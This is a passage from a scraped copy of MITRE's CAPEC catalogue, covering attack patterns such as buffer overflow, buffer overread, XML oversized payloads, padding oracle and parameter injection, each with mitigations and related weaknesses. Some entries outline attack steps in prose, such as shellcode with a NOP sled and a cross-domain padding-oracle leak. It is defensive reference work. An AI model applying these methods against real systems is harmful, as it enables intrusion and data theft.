Implementation: Execute program in less trusted process space environment, do not allow lower integrity processes to write to higher integrity processes

Implementation: Keep software patched to ensure that known vulnerabilities are not available for adversaries to target on host.

Example Instances

Binary files like music and video files are appended with additional data to cause buffer overflow on target systems. Because these files may be filled with otherwise popular content, the adversary has an excellent vector for wide distribution. There have been numerous cases, for example of malicious screen savers for sports teams that are distributed on the event of the team winning a championship.

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
697	Incorrect Comparison

References

[REF-1] G. Hoglund and G. McGraw. "Exploiting Software: How to Break Code". Addison-Wesley. 2004-02.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Description, Execution_Flow, Extended_Description
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Example_Instances, Mitigations

CAPEC-100: Overflow Buffers

Attack Pattern ID: 100

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	123	Buffer Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	8	Buffer Overflow in an API Call
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	9	Buffer Overflow in Local Command-Line Utilities
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	10	Buffer Overflow via Environment Variables
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	14	Client-side Injection-induced Buffer Overflow
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	24	Filter Failure through Buffer Overflow
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	42	MIME Conversion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	44	Overflow Binary Resource File
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	45	Buffer Overflow via Symbolic Links
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	46	Overflow Variables and Tags
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	47	Buffer Overflow via Parameter Expansion
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	67	String Format Overflow in syslog()
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	256	SOAP Array Overflow
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	234	Hijacking a privileged process

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.
Techniques
Provide large input to a program or application and observe the behavior. If there is a crash, this means that a buffer overflow attack is possible.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: Using the injection vector, the adversary injects the crafted overflow content into the buffer.

Prerequisites

Targeted software performs buffer operations.

Targeted software inadequately performs bounds-checking on buffer operations.

Adversary has the capability to influence the input to buffer operations.

Skills Required

[Level: Low]

In most cases, overflowing a buffer does not require advanced skills beyond the ability to notice an overflow and stuff an input variable with content.

[Level: High]

In cases of directed overflows, where the motive is to divert the flow of the program or application as per the adversaries' bidding, high level skills are required. This may involve detailed knowledge of the target system architecture and kernel.

Resources Required

None: No specialized resources are required to execute this type of attack. Detecting and exploiting a buffer overflow does not require any resources beyond knowledge of and access to the target system.

Indicators

An attack designed to leverage a buffer overflow and redirect execution as per the adversary's bidding is fairly difficult to detect. An attack aimed solely at bringing the system down is usually preceded by a barrage of long inputs that make no sense. In either case, it is likely that the adversary would have resorted to a few hit-or-miss attempts that will be recorded in the system event logs, if they exist.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Use a language or compiler that performs automatic bounds checking.

Use secure functions not vulnerable to buffer overflow.

If you have to use dangerous functions, make sure that you do boundary checking.

Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.

Use OS-level preventative functionality. Not a complete solution.

Utilize static source code analysis tools to identify potential buffer overflow weaknesses in the software.

Example Instances

The most straightforward example is an application that reads in input from the user and stores it in an internal buffer but does not check that the size of the input data is less than or equal to the size of the buffer. If the user enters excessive length data, the buffer may overflow leading to the application crashing, or worse, enabling the user to cause execution of injected code.

Many web servers enforce security in web applications through the use of filter plugins. An example is the SiteMinder plugin used for authentication. An overflow in such a plugin, possibly through a long URL or redirect parameter, can allow an adversary not only to bypass the security checks but also execute arbitrary code on the target web server in the context of the user that runs the web server process.

Related Weaknesses

CWE-ID	Weakness Name
120	Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
119	Improper Restriction of Operations within the Bounds of a Memory Buffer
131	Incorrect Calculation of Buffer Size
129	Improper Validation of Array Index
805	Buffer Access with Incorrect Length Value
680	Integer Overflow to Buffer Overflow

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
07	Buffer Overflow

Relevant to the OWASP taxonomy mapping

Entry Name
Buffer overflow attack

References

[REF-620] "OWASP Vulnerabilities". Buffer Overflow. The Open Web Application Security Project (OWASP). <https://owasp.org/www-community/vulnerabilities/Buffer_Overflow>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Indicators-Warnings_of_Attack, Probing_Techniques, Related_Vulnerabilities, Resources_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-46: Overflow Variables and Tags

Attack Pattern ID: 46

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	100	Overflow Buffers
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	8	Buffer Overflow in an API Call
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	10	Buffer Overflow via Environment Variables

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary identifies a target application or program to perform the buffer overflow on. Adversaries look for applications or programs that accept formatted files, such as configuration files, as input.

Experiment

Find injection vector: The adversary identifies an injection vector to deliver the excessive content to the targeted application's buffer.

Techniques
Knowing the type of file that an application takes as input, the adversary takes a normal input file and modifies a single variable or tag to contain a large amount of data. If there is a crash, this means that a buffer overflow attack is possible. The adversary will keep changing single variables or tags one by one until they see a change in behavior.

Techniques
Create malicious shellcode that will execute when the program execution is returned to it.
Use a NOP-sled in the overflow content to more easily "slide" into the malicious code. This is done so that the exact return address need not be correct, only in the range of all of the NOPs

Exploit

Overflow the buffer: The adversary will upload the crafted file to the application, causing a buffer overflow.

Prerequisites

The target program consumes user-controllable data in the form of tags or variables.

The target program does not perform sufficient boundary checking.

Skills Required

[Level: Low]

An adversary can simply overflow a buffer by inserting a long string into an adversary-modifiable injection vector. The result can be a DoS.

[Level: High]

Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Use a language or compiler that performs automatic bounds checking.

Use an abstraction library to abstract away risky APIs. Not a complete solution.

Compiler-based canary mechanisms such as StackGuard, ProPolice and the Microsoft Visual Studio /GS flag. Unless this provides automatic bounds checking, it is not a complete solution.

Use OS-level preventative functionality. Not a complete solution.

Do not trust input data from user. Validate all user input.

Example Instances

A buffer overflow vulnerability exists in the Yamaha MidiPlug that can be accessed via a Text variable found in an EMBED tag.

CAPEC-540: Overread Buffers

Attack Pattern ID: 540

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	123	Buffer Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Identify target application: The adversary identifies a target application or program to perform the buffer overread on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

Find attack vector: The adversary identifies an attack vector by looking for areas in the application where they can specify to read more data than is required.

Exploit

Overread the buffer: The adversary provides input to the application that gets it to read past the bounds of a buffer, possibly revealing sensitive information that was not intended to be given to the adversary.

Prerequisites

For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Availability	Unreliable Execution

Related Weaknesses

CWE-ID	Weakness Name
125	Out-of-bounds Read

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-231: Oversized Serialized Data Payloads

Attack Pattern ID: 231

Abstraction: Standard

View customized information:

Description

Extended Description

Applications often need to transform data in and out of serialized data formats, such as XML and YAML, by using a data parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. By supplying oversized payloads in input vectors that will be processed by the parser, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization, and potentially cause execution of arbitrary code. An adversary's goal is to leverage parser failure to their advantage. DoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious data payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.

Alternate Terms

Term: XML Denial of Service (XML DoS)

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	130	Excessive Allocation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	221	Data Serialization External Entities Blowup
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	229	Serialized Data Parameter Blowup

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

An adversary determines the input data stream that is being processed by an serialized data parser on the victim's side.

Experiment

An adversary crafts input data that may have an adverse effect on the operation of the data parser when the data is parsed on the victim's system.

Prerequisites

An application uses an parser for serialized data to perform transformation on user-controllable data.

An application does not perform sufficient validation to ensure that user-controllable data is safe for a data parser.

Skills Required

[Level: Low]

Denial of service

[Level: High]

Arbitrary code execution

Indicators

Bad data is passed to the serialized data parser (possibly repeatedly), possibly making it crash or execute arbitrary code.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Carefully validate and sanitize all user-controllable serialized data prior to passing it to the parser routine. Ensure that the resultant data is safe to pass to the parser.

Perform validation on canonical data.

Pick a robust implementation of the serialized data parser.

Validate data against a valid schema or DTD prior to parsing.

Related Weaknesses

CWE-ID	Weakness Name
112	Missing XML Validation
20	Improper Input Validation
674	Uncontrolled Recursion
770	Allocation of Resources Without Limits or Throttling

Notes

Other

In many cases this type of an attack will result in an XML Denial of Service (XDoS) or similar Denial of Service (DoS) due to an application becoming unstable, freezing, or crashing. However it is possible to cause a crash resulting in arbitrary code execution, leading to a jump from the data plane to the control plane [REF-89].

Other

The main weakness in serialized data related DoS is that the service provider generally must inspect, parse, and validate the data messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that DoS targets.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-89] Shlomo, Yona. "XML Parser Attacks: A summary of ways to attack an XML Parser". What is an XML Parser Attack?. 2007. <http://yeda.cs.technion.ac.il/~yona/talks/xml_parser_attacks/slides/slide2.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Alternate_Terms, Description, Execution_Flow, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, Description, Execution_Flow, Indicators, Mitigations, Prerequisites
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Notes
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Description, Extended_Description
Previous Entry Names
Change Date	Previous Entry Name
2020-07-30 (Version 3.3)	XML Oversized Payloads

CAPEC-577: Owner Footprinting

Attack Pattern ID: 577

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	169	Footprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.

Administrator permissions are required to view the home folder of other users.

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Mitigations

Ensure that proper permissions on files and folders are enacted to limit accessibility.

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1033	System Owner/User Discovery

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, References, Related_Weaknesses, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated @Abstraction

CAPEC-463: Padding Oracle Crypto Attack

Attack Pattern ID: 463

Abstraction: Detailed

View customized information:

Description

Extended Description

Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the adversary. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the adversary whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the adversary to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an adversary is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating.

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	97	Cryptanalysis

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Communications
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation

The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.

The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext.

Resources Required

Ability to detect instances where a target system is vulnerable to an oracle padding attack

Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key

Mitigations

Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption

Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption.

Example Instances

An adversary sends a request containing ciphertext to the target system. Due to the browser's same origin policy, the adversary is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). This can be done using "img" tag plus the onerror()/onload() events. The adversary's JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not.

Related Weaknesses

CWE-ID	Weakness Name
209	Generation of Error Message Containing Sensitive Information
514	Covert Channel
649	Reliance on Obfuscation or Encryption of Security-Relevant Inputs without Integrity Checking
347	Improper Verification of Cryptographic Signature
354	Improper Validation of Integrity Check Value
696	Incorrect Behavior Order

References

[REF-400] Juliano Rizzo and Thai Duong. "Practical Padding Oracle Attacks". 2010-05-25. <https://www.usenix.org/legacy/events/woot10/tech/full_papers/Rizzo.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Prerequisites, Description Summary
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Example_Instances, Mitigations
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description

CAPEC-137: Parameter Injection

Attack Pattern ID: 137

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	6	Argument Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	15	Command Delimiters
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	134	Email Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	135	Format String Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	138	Reflection Injection
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	182	Flash Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Social Engineering
Mechanisms of Attack	Inject Unexpected Items

Prerequisites

The target application must use a parameter encoding where separators and parameter identifiers are expressed in regular text.

The target application must accept a string as user input, fail to sanitize characters that have a special meaning in the parameter encoding, and insert the user-supplied string in an encoding which is then processed.

Resources Required

None: No specialized resources are required to execute this type of attack. The only requirement is the ability to provide string input to the target.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data

Mitigations

Implement an audit log written to a separate host. In the event of a compromise, the audit log may be able to provide evidence and details of the compromise.

Treat all user input as untrusted data that must be validated before use.

Related Weaknesses

CWE-ID	Weakness Name
88	Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Motivation-Consequences, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Description, Related_Weaknesses

CAPEC-48: Passing Local Filenames to Functions That Expect a URL

Attack Pattern ID: 48

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

High

Relationships

Nature	Type	ID	Name
